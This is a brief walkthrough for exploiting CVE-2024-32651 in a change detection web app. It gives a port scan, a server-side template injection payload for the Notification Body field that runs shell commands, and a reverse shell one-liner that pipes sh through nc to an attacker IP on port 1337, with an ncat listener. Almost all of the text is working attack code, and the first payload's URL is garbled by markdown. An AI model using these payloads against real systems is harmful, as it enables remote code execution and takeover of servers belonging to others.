CVE-2024-32651
Exploiting the change detection web app vulnerabilty.
Testing only
Check if service is runninng
nmap -Pn --open 192.168.214.97 -p 5000
Start local webserver
python3 -m http.server 8001
On the Notification Body field add the payload to connect to attacker
{{ self.**init**.**globals**.**builtins**.**import**('os').popen('curl [http://192.168.214.97:5000').read()](http://192.168.178.82:8001').read()) }}
Get a shell
Listen for incoming connections
rlwrap ncat -klvnp 1337Enter payload
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.178.82 1337 >/tmp/f').read() }}Last updated